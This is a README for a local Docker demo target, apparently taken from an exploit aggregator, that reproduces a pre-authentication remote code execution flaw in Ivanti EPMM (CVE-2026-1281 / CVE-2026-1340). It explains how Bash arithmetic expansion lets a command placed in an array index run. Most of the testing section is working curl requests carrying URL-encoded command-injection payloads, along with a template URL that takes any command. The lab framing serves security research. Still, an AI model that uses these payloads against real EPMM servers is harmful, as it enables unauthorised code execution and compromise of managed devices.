## https://sploitus.com/exploit?id=AC4871CE-CE60-5709-98A9-551F3A9DB7A2
# Ivanti EPMM pre-auth RCE Dummy Target
A simple demo application that shows how to reproduce the Ivanti EPMM pre-auth RCE vulnerability (CVE-2026-1281 / CVE-2026-1340) for educational and security research purposes.
## Vulnerability Overview
This vulnerability exploits Bash arithmetic expansion behavior. When a variable containing a reference to another variable is used in arithmetic context, and that referenced variable contains an array index with command substitution, the command is executed.
### The Exploit Chain
1. Request contains `st=theValue ` (literal string "theValue" with padding)
2. Request contains `h=gPath[\`command\`]` (command in array index)
3. Bash script parses key=value pairs in a loop, updating `theValue` each iteration
4. `gStartTime` is set to the literal string `"theValue"`
5. After loop, `theValue` contains `gPath[\`command\`]`
6. When `[[ ${currentTime} -gt ${gStartTime} ]]` is evaluated:
- `${gStartTime}` โ `"theValue"` (string)
- Arithmetic context treats `theValue` as variable reference
- `theValue` โ `gPath[\`command\`]`
- Array index triggers command substitution โ **RCE!**
## Quick Start
```bash
# Build and start the container
docker-compose up --build -d
# Check it's running
curl http://localhost:8180/health
```
## Testing the Vulnerability
### 1. File Creation Test
Create a file to prove command execution:
```bash
# URL-encoded payload: id > /mi/poc
curl "http://localhost:8180/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60id%20%3E%20/mi/poc%60%5D/test.ipa"
# Check if file was created
cat artifacts/poc
```
### 2. Time-Based Test
Verify with a sleep command:
```bash
# Should take ~5 seconds to respond
time curl "http://localhost:81080/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60sleep%205%60%5D/test.ipa"
```
### 3. Custom Command Execution
```bash
# Write custom content
curl "http://localhost:8180/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60echo%20PWNED%20%3E%20/mi/pwned%60%5D/test.ipa"
cat artifacts/pwned
```
## URL Structure
```
/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60COMMAND%60%5D/uuid.ipa
โ โ โ โ
โ โ โ โโ Payload: gPath[`COMMAND`]
โ โ โโ End timestamp (any 10 digits)
โ โโ CRITICAL: literal "theValue" + 2 spaces (10 chars total)
โโ Key index (any value)
```
## Debugging
```bash
# View container logs
docker-compose logs -f
# Get a shell in the container
docker exec -it ivanti-epmm-vuln /bin/bash
# Check nginx error logs
docker exec -it ivanti-epmm-vuln cat /var/log/nginx/error.log
```
## Cleanup
```bash
docker-compose down
rm -rf artifacts/*
```
## References
- [WatchTowr Labs Blog Post](https://labs.watchtowr.com/someone-knows-bash-far-too-well-and-we-love-it-ivanti-epmm-pre-auth-rces-cve-2026-1281-cve-2026-1340/)
## Disclaimer
This is for **educational and authorized security testing purposes only**. Do not use against systems you do not own or have explicit permission to test.